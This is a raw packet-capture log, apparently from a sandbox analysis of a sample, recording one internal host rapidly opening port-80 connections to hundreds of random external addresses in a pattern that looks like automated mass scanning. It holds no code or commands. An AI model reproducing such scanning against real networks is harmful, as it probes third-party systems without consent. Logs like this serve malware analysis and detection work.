                                          Nov 7, 2024 11:57:58.416615963 CET3044880192.168.2.1337.233.244.67
                                          Nov 7, 2024 11:57:58.416626930 CET3044880192.168.2.1337.204.105.101
                                          Nov 7, 2024 11:57:58.416650057 CET228880192.168.2.13206.162.131.43
                                          Nov 7, 2024 11:57:58.416660070 CET228880192.168.2.13206.96.54.192
                                          Nov 7, 2024 11:57:58.416670084 CET228880192.168.2.13206.190.26.233
                                          Nov 7, 2024 11:57:58.416676044 CET228880192.168.2.13206.82.73.57
                                          Nov 7, 2024 11:57:58.416718006 CET228880192.168.2.13206.10.33.15
                                          Nov 7, 2024 11:57:58.416722059 CET228880192.168.2.13206.213.68.103
                                          Nov 7, 2024 11:57:58.416742086 CET228880192.168.2.13206.200.10.247
                                          Nov 7, 2024 11:57:58.416742086 CET228880192.168.2.13206.206.73.207
                                          Nov 7, 2024 11:57:58.416778088 CET3044880192.168.2.1337.220.52.48
                                          Nov 7, 2024 11:57:58.416783094 CET3044880192.168.2.1337.164.74.30
                                          Nov 7, 2024 11:57:58.416800022 CET3044880192.168.2.1337.3.32.48
                                          Nov 7, 2024 11:57:58.416802883 CET3044880192.168.2.1337.55.11.48
                                          Nov 7, 2024 11:57:58.416810036 CET802288206.0.241.145192.168.2.13
                                          Nov 7, 2024 11:57:58.416846037 CET228880192.168.2.13206.228.227.64
                                          Nov 7, 2024 11:57:58.416846037 CET228880192.168.2.13206.0.241.145
                                          Nov 7, 2024 11:57:58.416852951 CET228880192.168.2.13206.88.166.76
                                          Nov 7, 2024 11:57:58.416865110 CET228880192.168.2.13206.181.199.130
                                          Nov 7, 2024 11:57:58.416881084 CET228880192.168.2.13206.207.74.244
                                          Nov 7, 2024 11:57:58.416914940 CET3044880192.168.2.1337.18.47.187
                                          Nov 7, 2024 11:57:58.416920900 CET3044880192.168.2.1337.197.197.202
                                          Nov 7, 2024 11:57:58.416943073 CET3044880192.168.2.1337.216.10.39
                                          Nov 7, 2024 11:57:58.416944981 CET3044880192.168.2.1337.176.239.145
                                          Nov 7, 2024 11:57:58.416971922 CET3044880192.168.2.1337.52.106.21
                                          Nov 7, 2024 11:57:58.416987896 CET228880192.168.2.13206.213.10.106
                                          Nov 7, 2024 11:57:58.416995049 CET228880192.168.2.13206.61.85.225
                                          Nov 7, 2024 11:57:58.417011976 CET228880192.168.2.13206.103.60.226
                                          Nov 7, 2024 11:57:58.417016029 CET228880192.168.2.13206.47.100.242
                                          Nov 7, 2024 11:57:58.417018890 CET228880192.168.2.13206.146.213.3
                                          Nov 7, 2024 11:57:58.417058945 CET3044880192.168.2.1337.157.203.158
                                          Nov 7, 2024 11:57:58.417073011 CET3044880192.168.2.1337.166.190.110
                                          Nov 7, 2024 11:57:58.417083025 CET3044880192.168.2.1337.201.213.216
                                          Nov 7, 2024 11:57:58.417119980 CET228880192.168.2.13206.31.255.205
                                          Nov 7, 2024 11:57:58.417125940 CET228880192.168.2.13206.173.9.210
                                          Nov 7, 2024 11:57:58.417140961 CET228880192.168.2.13206.142.43.120
                                          Nov 7, 2024 11:57:58.417160034 CET228880192.168.2.13206.54.185.182
                                          Nov 7, 2024 11:57:58.417181015 CET3044880192.168.2.1337.199.243.206
                                          Nov 7, 2024 11:57:58.417193890 CET3044880192.168.2.1337.147.115.40
                                          Nov 7, 2024 11:57:58.417202950 CET3044880192.168.2.1337.198.187.23
                                          Nov 7, 2024 11:57:58.417206049 CET3044880192.168.2.1337.125.132.15
                                          Nov 7, 2024 11:57:58.417243958 CET3044880192.168.2.1337.82.17.154
                                          Nov 7, 2024 11:57:58.417256117 CET3044880192.168.2.1337.117.38.206
                                          Nov 7, 2024 11:57:58.417272091 CET3044880192.168.2.1337.145.71.42
                                          Nov 7, 2024 11:57:58.417273045 CET3044880192.168.2.1337.161.55.243
                                          Nov 7, 2024 11:57:58.417330027 CET228880192.168.2.13206.79.35.52
                                          Nov 7, 2024 11:57:58.417330027 CET228880192.168.2.13206.62.120.125
                                          Nov 7, 2024 11:57:58.417380095 CET3044880192.168.2.1337.152.177.176
                                          Nov 7, 2024 11:57:58.417392969 CET3044880192.168.2.1337.144.236.210
                                          Nov 7, 2024 11:57:58.417399883 CET3044880192.168.2.1337.153.212.53
                                          Nov 7, 2024 11:57:58.417428970 CET3044880192.168.2.1337.189.33.215
                                          Nov 7, 2024 11:57:58.417453051 CET228880192.168.2.13206.22.225.173
                                          Nov 7, 2024 11:57:58.417453051 CET228880192.168.2.13206.46.34.95
                                          Nov 7, 2024 11:57:58.417464018 CET228880192.168.2.13206.153.79.237
                                          Nov 7, 2024 11:57:58.417467117 CET228880192.168.2.13206.176.176.251
                                          Nov 7, 2024 11:57:58.417476892 CET228880192.168.2.13206.160.90.242
                                          Nov 7, 2024 11:57:58.417510986 CET3044880192.168.2.1337.49.122.168
                                          Nov 7, 2024 11:57:58.417536974 CET3044880192.168.2.1337.252.33.11
                                          Nov 7, 2024 11:57:58.417542934 CET3044880192.168.2.1337.95.37.119
                                          Nov 7, 2024 11:57:58.417557001 CET3044880192.168.2.1337.209.132.233
                                          Nov 7, 2024 11:57:58.417578936 CET228880192.168.2.13206.155.233.117
                                          Nov 7, 2024 11:57:58.417591095 CET228880192.168.2.13206.108.100.75
                                          Nov 7, 2024 11:57:58.417592049 CET228880192.168.2.13206.126.67.79
                                          Nov 7, 2024 11:57:58.417597055 CET228880192.168.2.13206.74.79.140
                                          Nov 7, 2024 11:57:58.417610884 CET228880192.168.2.13206.69.25.228
                                          Nov 7, 2024 11:57:58.417644978 CET3044880192.168.2.1337.86.34.80
                                          Nov 7, 2024 11:57:58.417659044 CET3044880192.168.2.1337.113.230.128
                                          Nov 7, 2024 11:57:58.417663097 CET3044880192.168.2.1337.59.53.163
                                          Nov 7, 2024 11:57:58.417670965 CET3044880192.168.2.1337.107.227.249
                                          Nov 7, 2024 11:57:58.417711020 CET228880192.168.2.13206.181.89.255
                                          Nov 7, 2024 11:57:58.417717934 CET228880192.168.2.13206.106.207.173
                                          Nov 7, 2024 11:57:58.417726994 CET228880192.168.2.13206.134.185.18
                                          Nov 7, 2024 11:57:58.417742968 CET228880192.168.2.13206.47.82.204
                                          Nov 7, 2024 11:57:58.417742968 CET228880192.168.2.13206.66.252.193
                                          Nov 7, 2024 11:57:58.417752981 CET228880192.168.2.13206.62.29.122
                                          Nov 7, 2024 11:57:58.417792082 CET3044880192.168.2.1337.224.116.52
                                          Nov 7, 2024 11:57:58.417798996 CET3044880192.168.2.1337.40.67.122
                                          Nov 7, 2024 11:57:58.417805910 CET3044880192.168.2.1337.223.31.92
                                          Nov 7, 2024 11:57:58.417819023 CET3044880192.168.2.1337.252.81.207
                                          Nov 7, 2024 11:57:58.417820930 CET3044880192.168.2.1337.28.113.123
                                          Nov 7, 2024 11:57:58.417828083 CET3044880192.168.2.1337.150.210.140
                                          Nov 7, 2024 11:57:58.417870045 CET228880192.168.2.13206.148.207.30
                                          Nov 7, 2024 11:57:58.417882919 CET228880192.168.2.13206.206.83.199
                                          Nov 7, 2024 11:57:58.417886019 CET228880192.168.2.13206.199.141.174
                                          Nov 7, 2024 11:57:58.417886019 CET228880192.168.2.13206.67.155.250
                                          Nov 7, 2024 11:57:58.417901993 CET228880192.168.2.13206.131.203.241
                                          Nov 7, 2024 11:57:58.417916059 CET228880192.168.2.13206.112.178.71
                                          Nov 7, 2024 11:57:58.417948008 CET3044880192.168.2.1337.174.55.21
                                          Nov 7, 2024 11:57:58.417963028 CET3044880192.168.2.1337.13.229.233
                                          Nov 7, 2024 11:57:58.417968988 CET3044880192.168.2.1337.156.228.18
                                          Nov 7, 2024 11:57:58.417972088 CET3044880192.168.2.1337.76.68.225
                                          Nov 7, 2024 11:57:58.418009043 CET228880192.168.2.13206.112.139.18
                                          Nov 7, 2024 11:57:58.418018103 CET228880192.168.2.13206.90.115.25
                                          Nov 7, 2024 11:57:58.418025017 CET228880192.168.2.13206.139.169.127
                                          Nov 7, 2024 11:57:58.418026924 CET228880192.168.2.13206.230.55.139
                                          Nov 7, 2024 11:57:58.418042898 CET228880192.168.2.13206.107.194.235
                                          Nov 7, 2024 11:57:58.418056965 CET228880192.168.2.13206.69.10.65
                                          Nov 7, 2024 11:57:58.418061972 CET228880192.168.2.13206.160.164.104
                                          Nov 7, 2024 11:57:58.418078899 CET228880192.168.2.13206.246.62.25
                                          Nov 7, 2024 11:57:58.418078899 CET228880192.168.2.13206.117.193.236
                                          Nov 7, 2024 11:57:58.418087006 CET228880192.168.2.13206.184.150.27
                                          Nov 7, 2024 11:57:58.418138027 CET3044880192.168.2.1337.244.75.12
                                          Nov 7, 2024 11:57:58.418143988 CET3044880192.168.2.1337.112.130.169
                                          Nov 7, 2024 11:57:58.418158054 CET3044880192.168.2.1337.138.236.36
                                          Nov 7, 2024 11:57:58.418160915 CET3044880192.168.2.1337.6.219.242
                                          Nov 7, 2024 11:57:58.418169975 CET3044880192.168.2.1337.253.248.81
                                          Nov 7, 2024 11:57:58.418181896 CET3044880192.168.2.1337.52.34.19
                                          Nov 7, 2024 11:57:58.418181896 CET3044880192.168.2.1337.33.218.156
                                          Nov 7, 2024 11:57:58.418189049 CET3044880192.168.2.1337.131.47.181
                                          Nov 7, 2024 11:57:58.418227911 CET3044880192.168.2.1337.25.45.44
                                          Nov 7, 2024 11:57:58.418236971 CET3044880192.168.2.1337.59.236.62
                                          Nov 7, 2024 11:57:58.418251038 CET3044880192.168.2.1337.55.121.190
                                          Nov 7, 2024 11:57:58.418298006 CET228880192.168.2.13206.199.15.181
                                          Nov 7, 2024 11:57:58.418298960 CET228880192.168.2.13206.187.216.197
                                          Nov 7, 2024 11:57:58.418301105 CET228880192.168.2.13206.236.137.44
                                          Nov 7, 2024 11:57:58.418339014 CET3044880192.168.2.1337.35.40.149
                                          Nov 7, 2024 11:57:58.418348074 CET3044880192.168.2.1337.78.216.252
                                          Nov 7, 2024 11:57:58.418354034 CET3044880192.168.2.1337.12.71.245
                                          Nov 7, 2024 11:57:58.418365955 CET3044880192.168.2.1337.84.227.201
                                          Nov 7, 2024 11:57:58.418370962 CET3044880192.168.2.1337.205.207.111
                                          Nov 7, 2024 11:57:58.418395042 CET3044880192.168.2.1337.162.11.63
                                          Nov 7, 2024 11:57:58.418426037 CET228880192.168.2.13206.184.52.136
                                          Nov 7, 2024 11:57:58.418441057 CET228880192.168.2.13206.115.38.144
                                          Nov 7, 2024 11:57:58.418442011 CET228880192.168.2.13206.180.60.137
                                          Nov 7, 2024 11:57:58.418445110 CET228880192.168.2.13206.240.126.167
                                          Nov 7, 2024 11:57:58.418451071 CET228880192.168.2.13206.191.157.175
                                          Nov 7, 2024 11:57:58.418452978 CET228880192.168.2.13206.146.140.231
                                          Nov 7, 2024 11:57:58.418464899 CET228880192.168.2.13206.123.85.31
                                          Nov 7, 2024 11:57:58.418504953 CET3044880192.168.2.1337.38.101.228
                                          Nov 7, 2024 11:57:58.418512106 CET3044880192.168.2.1337.160.51.123
                                          Nov 7, 2024 11:57:58.418520927 CET3044880192.168.2.1337.233.125.46
                                          Nov 7, 2024 11:57:58.418529987 CET3044880192.168.2.1337.202.85.162
                                          Nov 7, 2024 11:57:58.418562889 CET228880192.168.2.13206.171.198.240
                                          Nov 7, 2024 11:57:58.418585062 CET228880192.168.2.13206.128.139.131
                                          Nov 7, 2024 11:57:58.418586016 CET228880192.168.2.13206.152.50.232
                                          Nov 7, 2024 11:57:58.418596029 CET228880192.168.2.13206.105.140.161
                                          Nov 7, 2024 11:57:58.418601990 CET228880192.168.2.13206.174.180.158
                                          Nov 7, 2024 11:57:58.418603897 CET228880192.168.2.13206.116.149.188
                                          Nov 7, 2024 11:57:58.418637991 CET3044880192.168.2.1337.153.249.187
                                          Nov 7, 2024 11:57:58.418644905 CET3044880192.168.2.1337.134.63.241
                                          Nov 7, 2024 11:57:58.418658018 CET3044880192.168.2.1337.116.241.156
                                          Nov 7, 2024 11:57:58.418668985 CET3044880192.168.2.1337.65.249.216
                                          Nov 7, 2024 11:57:58.418705940 CET3044880192.168.2.1337.111.210.154
                                          Nov 7, 2024 11:57:58.418715954 CET3044880192.168.2.1337.182.208.155
                                          Nov 7, 2024 11:57:58.418729067 CET3044880192.168.2.1337.121.150.147
                                          Nov 7, 2024 11:57:58.418735027 CET3044880192.168.2.1337.27.113.141
                                          Nov 7, 2024 11:57:58.418746948 CET3044880192.168.2.1337.135.52.140
                                          Nov 7, 2024 11:57:58.418746948 CET3044880192.168.2.1337.147.4.73
                                          Nov 7, 2024 11:57:58.418781996 CET3044880192.168.2.1337.254.252.177
                                          Nov 7, 2024 11:57:58.418788910 CET228880192.168.2.13206.56.188.168
                                          Nov 7, 2024 11:57:58.418791056 CET228880192.168.2.13206.191.202.242
                                          Nov 7, 2024 11:57:58.418800116 CET228880192.168.2.13206.214.186.44
                                          Nov 7, 2024 11:57:58.418816090 CET228880192.168.2.13206.129.25.231
                                          Nov 7, 2024 11:57:58.418826103 CET228880192.168.2.13206.202.75.61
                                          Nov 7, 2024 11:57:58.418872118 CET228880192.168.2.13206.184.21.111
                                          Nov 7, 2024 11:57:58.418875933 CET228880192.168.2.13206.120.53.149
                                          Nov 7, 2024 11:57:58.418879032 CET228880192.168.2.13206.191.248.10
                                          Nov 7, 2024 11:57:58.418900013 CET228880192.168.2.13206.231.37.211
                                          Nov 7, 2024 11:57:58.418901920 CET228880192.168.2.13206.132.240.173
                                          Nov 7, 2024 11:57:58.418903112 CET228880192.168.2.13206.66.106.20
                                          Nov 7, 2024 11:57:58.418903112 CET228880192.168.2.13206.148.52.159
                                          Nov 7, 2024 11:57:58.418953896 CET3044880192.168.2.1337.79.236.218
                                          Nov 7, 2024 11:57:58.418957949 CET3044880192.168.2.1337.198.193.205
                                          Nov 7, 2024 11:57:58.418962955 CET3044880192.168.2.1337.123.30.61
                                          Nov 7, 2024 11:57:58.418971062 CET3044880192.168.2.1337.185.9.169
                                          Nov 7, 2024 11:57:58.419018030 CET3044880192.168.2.1337.107.100.87
                                          Nov 7, 2024 11:57:58.419024944 CET3044880192.168.2.1337.134.144.42
                                          Nov 7, 2024 11:57:58.419033051 CET3044880192.168.2.1337.245.192.93
                                          Nov 7, 2024 11:57:58.419035912 CET3044880192.168.2.1337.210.97.142
                                          Nov 7, 2024 11:57:58.419040918 CET3044880192.168.2.1337.192.255.121
                                          Nov 7, 2024 11:57:58.419054031 CET3044880192.168.2.1337.123.246.174
                                          Nov 7, 2024 11:57:58.419054985 CET3044880192.168.2.1337.237.169.146
                                          Nov 7, 2024 11:57:58.419068098 CET3044880192.168.2.1337.243.173.75
                                          Nov 7, 2024 11:57:58.419083118 CET3044880192.168.2.1337.238.149.50
                                          Nov 7, 2024 11:57:58.419090986 CET3044880192.168.2.1337.235.132.3
                                          Nov 7, 2024 11:57:58.419091940 CET3044880192.168.2.1337.77.212.186
                                          Nov 7, 2024 11:57:58.419104099 CET3044880192.168.2.1337.168.78.31
                                          Nov 7, 2024 11:57:58.419145107 CET228880192.168.2.13206.204.56.34
                                          Nov 7, 2024 11:57:58.419153929 CET228880192.168.2.13206.162.112.245
                                          Nov 7, 2024 11:57:58.419172049 CET228880192.168.2.13206.107.107.36
                                          Nov 7, 2024 11:57:58.419173002 CET228880192.168.2.13206.119.13.121
                                          Nov 7, 2024 11:57:58.419184923 CET228880192.168.2.13206.131.23.100
                                          Nov 7, 2024 11:57:58.419187069 CET228880192.168.2.13206.88.45.146
                                          Nov 7, 2024 11:57:58.419205904 CET228880192.168.2.13206.95.60.191
                                          Nov 7, 2024 11:57:58.419210911 CET228880192.168.2.13206.158.36.158
                                          Nov 7, 2024 11:57:58.419251919 CET228880192.168.2.13206.113.128.142
                                          Nov 7, 2024 11:57:58.419255018 CET228880192.168.2.13206.251.173.253
                                          Nov 7, 2024 11:57:58.419270992 CET228880192.168.2.13206.94.181.109
                                          Nov 7, 2024 11:57:58.419276953 CET228880192.168.2.13206.139.52.219
                                          Nov 7, 2024 11:57:58.419286013 CET228880192.168.2.13206.203.245.78
                                          Nov 7, 2024 11:57:58.419320107 CET3044880192.168.2.1337.5.242.197
                                          Nov 7, 2024 11:57:58.419333935 CET3044880192.168.2.1337.245.198.131
                                          Nov 7, 2024 11:57:58.419337988 CET3044880192.168.2.1337.189.217.212
                                          Nov 7, 2024 11:57:58.419338942 CET3044880192.168.2.1337.206.74.171
                                          Nov 7, 2024 11:57:58.419347048 CET3044880192.168.2.1337.158.147.203
                                          Nov 7, 2024 11:57:58.419373989 CET3044880192.168.2.1337.66.25.31
                                          Nov 7, 2024 11:57:58.419373989 CET3044880192.168.2.1337.106.21.12
                                          Nov 7, 2024 11:57:58.419378042 CET3044880192.168.2.1337.59.27.249
                                          Nov 7, 2024 11:57:58.419378042 CET3044880192.168.2.1337.68.131.113
                                          Nov 7, 2024 11:57:58.419394970 CET3044880192.168.2.1337.237.243.221
                                          Nov 7, 2024 11:57:58.419428110 CET228880192.168.2.13206.132.75.239
                                          Nov 7, 2024 11:57:58.419444084 CET228880192.168.2.13206.195.13.34
                                          Nov 7, 2024 11:57:58.419456005 CET228880192.168.2.13206.118.160.123
                                          Nov 7, 2024 11:57:58.419461012 CET228880192.168.2.13206.172.210.237
                                          Nov 7, 2024 11:57:58.419473886 CET228880192.168.2.13206.109.46.35
                                          Nov 7, 2024 11:57:58.419509888 CET3044880192.168.2.1337.151.191.239
                                          Nov 7, 2024 11:57:58.419527054 CET3044880192.168.2.1337.24.234.75
                                          Nov 7, 2024 11:57:58.419543982 CET3044880192.168.2.1337.164.120.65
                                          Nov 7, 2024 11:57:58.419547081 CET3044880192.168.2.1337.192.86.246
                                          Nov 7, 2024 11:57:58.419550896 CET3044880192.168.2.1337.77.163.66
                                          Nov 7, 2024 11:57:58.419591904 CET228880192.168.2.13206.184.52.131
                                          Nov 7, 2024 11:57:58.419598103 CET228880192.168.2.13206.123.99.159
                                          Nov 7, 2024 11:57:58.419615984 CET228880192.168.2.13206.10.89.113
                                          Nov 7, 2024 11:57:58.419625044 CET228880192.168.2.13206.219.64.163
                                          Nov 7, 2024 11:57:58.419625044 CET228880192.168.2.13206.7.99.235
                                          Nov 7, 2024 11:57:58.419637918 CET228880192.168.2.13206.107.184.134
                                          Nov 7, 2024 11:57:58.419670105 CET3044880192.168.2.1337.254.97.157
                                          Nov 7, 2024 11:57:58.419681072 CET3044880192.168.2.1337.179.61.247
                                          Nov 7, 2024 11:57:58.419696093 CET3044880192.168.2.1337.117.130.64
                                          Nov 7, 2024 11:57:58.419696093 CET3044880192.168.2.1337.46.226.183
                                          Nov 7, 2024 11:57:58.419703007 CET3044880192.168.2.1337.200.80.72
                                          Nov 7, 2024 11:57:58.419728041 CET3044880192.168.2.1337.230.128.200
                                          Nov 7, 2024 11:57:58.419755936 CET228880192.168.2.13206.254.98.203
                                          Nov 7, 2024 11:57:58.419756889 CET228880192.168.2.13206.207.233.194
                                          Nov 7, 2024 11:57:58.419769049 CET228880192.168.2.13206.176.42.104
                                          Nov 7, 2024 11:57:58.419799089 CET228880192.168.2.13206.5.232.3
                                          Nov 7, 2024 11:57:58.419822931 CET3044880192.168.2.1337.153.64.97
                                          Nov 7, 2024 11:57:58.419838905 CET3044880192.168.2.1337.112.56.88
                                          Nov 7, 2024 11:57:58.419841051 CET3044880192.168.2.1337.226.183.91
                                          Nov 7, 2024 11:57:58.419847012 CET3044880192.168.2.1337.159.221.109
                                          Nov 7, 2024 11:57:58.419871092 CET3044880192.168.2.1337.108.220.234
                                          Nov 7, 2024 11:57:58.419872046 CET3044880192.168.2.1337.156.186.143
                                          Nov 7, 2024 11:57:58.419872046 CET3044880192.168.2.1337.128.69.14
                                          Nov 7, 2024 11:57:58.419886112 CET3044880192.168.2.1337.84.15.111
                                          Nov 7, 2024 11:57:58.419891119 CET3044880192.168.2.1337.108.3.122
                                          Nov 7, 2024 11:57:58.419919014 CET228880192.168.2.13206.47.65.65
                                          Nov 7, 2024 11:57:58.419933081 CET228880192.168.2.13206.238.216.227
                                          Nov 7, 2024 11:57:58.419935942 CET228880192.168.2.13206.158.99.116
                                          Nov 7, 2024 11:57:58.419948101 CET228880192.168.2.13206.17.53.3
                                          Nov 7, 2024 11:57:58.419956923 CET228880192.168.2.13206.177.201.243
                                          Nov 7, 2024 11:57:58.419970989 CET228880192.168.2.13206.154.211.149
                                          Nov 7, 2024 11:57:58.419998884 CET228880192.168.2.13206.78.175.34
                                          Nov 7, 2024 11:57:58.420007944 CET228880192.168.2.13206.238.121.53
                                          Nov 7, 2024 11:57:58.420022964 CET228880192.168.2.13206.11.30.79
                                          Nov 7, 2024 11:57:58.420027018 CET228880192.168.2.13206.251.57.50
                                          Nov 7, 2024 11:57:58.420036077 CET228880192.168.2.13206.173.135.122
                                          Nov 7, 2024 11:57:58.420078039 CET3044880192.168.2.1337.73.20.255
                                          Nov 7, 2024 11:57:58.420100927 CET3044880192.168.2.1337.100.31.155
                                          Nov 7, 2024 11:57:58.420100927 CET3044880192.168.2.1337.78.113.241
                                          Nov 7, 2024 11:57:58.420111895 CET3044880192.168.2.1337.223.155.199
                                          Nov 7, 2024 11:57:58.420151949 CET3044880192.168.2.1337.110.177.77
                                          Nov 7, 2024 11:57:58.420159101 CET3044880192.168.2.1337.102.50.251
                                          Nov 7, 2024 11:57:58.420162916 CET3044880192.168.2.1337.97.73.189
                                          Nov 7, 2024 11:57:58.420178890 CET3044880192.168.2.1337.191.91.26
                                          Nov 7, 2024 11:57:58.420187950 CET3044880192.168.2.1337.221.222.192
                                          Nov 7, 2024 11:57:58.420191050 CET3044880192.168.2.1337.186.109.68
                                          Nov 7, 2024 11:57:58.420229912 CET228880192.168.2.13206.201.166.42
                                          Nov 7, 2024 11:57:58.420243979 CET228880192.168.2.13206.216.199.105
                                          Nov 7, 2024 11:57:58.420247078 CET228880192.168.2.13206.74.80.65
                                          Nov 7, 2024 11:57:58.420250893 CET228880192.168.2.13206.163.6.115
                                          Nov 7, 2024 11:57:58.420269012 CET228880192.168.2.13206.194.215.26
                                          Nov 7, 2024 11:57:58.420274973 CET228880192.168.2.13206.94.254.240
                                          Nov 7, 2024 11:57:58.420281887 CET228880192.168.2.13206.218.87.129
                                          Nov 7, 2024 11:57:58.420321941 CET3044880192.168.2.1337.69.23.113
                                          Nov 7, 2024 11:57:58.420321941 CET3044880192.168.2.1337.129.94.233
                                          Nov 7, 2024 11:57:58.420339108 CET3044880192.168.2.1337.4.119.146
                                          Nov 7, 2024 11:57:58.420341015 CET3044880192.168.2.1337.62.95.132
                                          Nov 7, 2024 11:57:58.420382977 CET228880192.168.2.13206.141.70.89
                                          Nov 7, 2024 11:57:58.420389891 CET228880192.168.2.13206.77.43.23
                                          Nov 7, 2024 11:57:58.420413017 CET228880192.168.2.13206.176.36.91
                                          Nov 7, 2024 11:57:58.420416117 CET228880192.168.2.13206.27.157.38
                                          Nov 7, 2024 11:57:58.420425892 CET228880192.168.2.13206.221.167.187
                                          Nov 7, 2024 11:57:58.420427084 CET228880192.168.2.13206.30.10.48
                                          Nov 7, 2024 11:57:58.420463085 CET3044880192.168.2.1337.20.77.178
                                          Nov 7, 2024 11:57:58.420479059 CET3044880192.168.2.1337.163.55.94
                                          Nov 7, 2024 11:57:58.420490980 CET3044880192.168.2.1337.177.10.162
                                          Nov 7, 2024 11:57:58.420491934 CET3044880192.168.2.1337.149.218.245
                                          Nov 7, 2024 11:57:58.420531034 CET228880192.168.2.13206.222.164.227
                                          Nov 7, 2024 11:57:58.420535088 CET228880192.168.2.13206.148.59.98
                                          Nov 7, 2024 11:57:58.420547009 CET228880192.168.2.13206.96.121.245
                                          Nov 7, 2024 11:57:58.420552969 CET228880192.168.2.13206.89.54.118
                                          Nov 7, 2024 11:57:58.420584917 CET228880192.168.2.13206.61.8.54
                                          Nov 7, 2024 11:57:58.420605898 CET3044880192.168.2.1337.155.164.13
                                          Nov 7, 2024 11:57:58.420623064 CET3044880192.168.2.1337.212.70.232
                                          Nov 7, 2024 11:57:58.420624018 CET3044880192.168.2.1337.71.198.79
                                          Nov 7, 2024 11:57:58.420639038 CET3044880192.168.2.1337.161.136.139
                                          Nov 7, 2024 11:57:58.420639038 CET3044880192.168.2.1337.36.166.28
                                          Nov 7, 2024 11:57:58.420661926 CET3044880192.168.2.1337.5.57.96
                                          Nov 7, 2024 11:57:58.420687914 CET228880192.168.2.13206.30.15.190
                                          Nov 7, 2024 11:57:58.420706034 CET228880192.168.2.13206.246.205.138
                                          Nov 7, 2024 11:57:58.420712948 CET228880192.168.2.13206.231.230.186
                                          Nov 7, 2024 11:57:58.420712948 CET228880192.168.2.13206.49.44.81
                                          Nov 7, 2024 11:57:58.420731068 CET228880192.168.2.13206.139.232.121
                                          Nov 7, 2024 11:57:58.420743942 CET228880192.168.2.13206.99.58.92
                                          Nov 7, 2024 11:57:58.420777082 CET3044880192.168.2.1337.224.152.254
                                          Nov 7, 2024 11:57:58.420778036 CET3044880192.168.2.1337.71.10.69
                                          Nov 7, 2024 11:57:58.420789957 CET3044880192.168.2.1337.39.122.184
                                          Nov 7, 2024 11:57:58.420798063 CET3044880192.168.2.1337.127.85.210
                                          Nov 7, 2024 11:57:58.420814037 CET3044880192.168.2.1337.71.73.252
                                          Nov 7, 2024 11:57:58.420814991 CET3044880192.168.2.1337.71.182.223
                                          Nov 7, 2024 11:57:58.420826912 CET3044880192.168.2.1337.226.83.224
                                          Nov 7, 2024 11:57:58.420841932 CET3044880192.168.2.1337.117.237.1
                                          Nov 7, 2024 11:57:58.420842886 CET3044880192.168.2.1337.242.193.160
                                          Nov 7, 2024 11:57:58.420850992 CET3044880192.168.2.1337.246.183.229
                                          Nov 7, 2024 11:57:58.420866966 CET3044880192.168.2.1337.111.1.94
                                          Nov 7, 2024 11:57:58.420900106 CET228880192.168.2.13206.180.198.85
                                          Nov 7, 2024 11:57:58.420902967 CET228880192.168.2.13206.95.131.192
                                          Nov 7, 2024 11:57:58.420917034 CET228880192.168.2.13206.119.174.165
                                          Nov 7, 2024 11:57:58.420928001 CET228880192.168.2.13206.197.34.100
                                          Nov 7, 2024 11:57:58.420937061 CET228880192.168.2.13206.98.162.17
                                          Nov 7, 2024 11:57:58.420977116 CET228880192.168.2.13206.30.12.220
                                          Nov 7, 2024 11:57:58.420977116 CET228880192.168.2.13206.157.21.61
                                          Nov 7, 2024 11:57:58.420995951 CET228880192.168.2.13206.133.137.186
                                          Nov 7, 2024 11:57:58.421008110 CET228880192.168.2.13206.235.193.57
                                          Nov 7, 2024 11:57:58.421020985 CET802288206.4.186.235192.168.2.13
                                          Nov 7, 2024 11:57:58.421045065 CET3044880192.168.2.1337.155.123.28
                                          Nov 7, 2024 11:57:58.421046972 CET3044880192.168.2.1337.71.49.94
                                          Nov 7, 2024 11:57:58.421061993 CET228880192.168.2.13206.4.186.235
                                          Nov 7, 2024 11:57:58.421076059 CET3044880192.168.2.1337.119.24.182
                                          Nov 7, 2024 11:57:58.421080112 CET3044880192.168.2.1337.184.187.179
                                          Nov 7, 2024 11:57:58.421114922 CET3044880192.168.2.1337.203.8.128
                                          Nov 7, 2024 11:57:58.421129942 CET228880192.168.2.13206.90.236.182
                                          Nov 7, 2024 11:57:58.421133041 CET228880192.168.2.13206.179.158.64
                                          Nov 7, 2024 11:57:58.421154022 CET228880192.168.2.13206.25.34.57
                                          Nov 7, 2024 11:57:58.421154022 CET228880192.168.2.13206.78.97.102
                                          Nov 7, 2024 11:57:58.421192884 CET228880192.168.2.13206.48.65.204
                                          Nov 7, 2024 11:57:58.421210051 CET228880192.168.2.13206.5.108.194
                                          Nov 7, 2024 11:57:58.421221972 CET228880192.168.2.13206.189.199.127
                                          Nov 7, 2024 11:57:58.421242952 CET228880192.168.2.13206.48.228.198
                                          Nov 7, 2024 11:57:58.421264887 CET3044880192.168.2.1337.23.133.113
                                          Nov 7, 2024 11:57:58.421276093 CET3044880192.168.2.1337.8.197.132
                                          Nov 7, 2024 11:57:58.421286106 CET3044880192.168.2.1337.59.42.27
                                          Nov 7, 2024 11:57:58.421288013 CET3044880192.168.2.1337.163.82.123
                                          Nov 7, 2024 11:57:58.421299934 CET3044880192.168.2.1337.143.196.117
                                          Nov 7, 2024 11:57:58.421303988 CET3044880192.168.2.1337.185.210.155
                                          Nov 7, 2024 11:57:58.421333075 CET3044880192.168.2.1337.65.233.73
                                          Nov 7, 2024 11:57:58.421376944 CET228880192.168.2.13206.153.157.232
                                          Nov 7, 2024 11:57:58.421376944 CET228880192.168.2.13206.16.232.124
                                          Nov 7, 2024 11:57:58.421391010 CET228880192.168.2.13206.184.53.222
                                          Nov 7, 2024 11:57:58.421396971 CET228880192.168.2.13206.145.168.116
                                          Nov 7, 2024 11:57:58.421401024 CET228880192.168.2.13206.18.239.169
                                          Nov 7, 2024 11:57:58.421441078 CET3044880192.168.2.1337.47.69.248
                                          Nov 7, 2024 11:57:58.421441078 CET3044880192.168.2.1337.9.148.192
                                          Nov 7, 2024 11:57:58.421449900 CET3044880192.168.2.1337.203.128.124
                                          Nov 7, 2024 11:57:58.421458006 CET3044880192.168.2.1337.27.117.87
                                          Nov 7, 2024 11:57:58.421471119 CET3044880192.168.2.1337.204.148.239
                                          Nov 7, 2024 11:57:58.421503067 CET228880192.168.2.13206.89.1.204
                                          Nov 7, 2024 11:57:58.421525955 CET228880192.168.2.13206.213.78.106
                                          Nov 7, 2024 11:57:58.421528101 CET228880192.168.2.13206.158.155.62
                                          Nov 7, 2024 11:57:58.421531916 CET228880192.168.2.13206.5.104.169
                                          Nov 7, 2024 11:57:58.421539068 CET228880192.168.2.13206.173.39.18
                                          Nov 7, 2024 11:57:58.421559095 CET228880192.168.2.13206.98.187.216
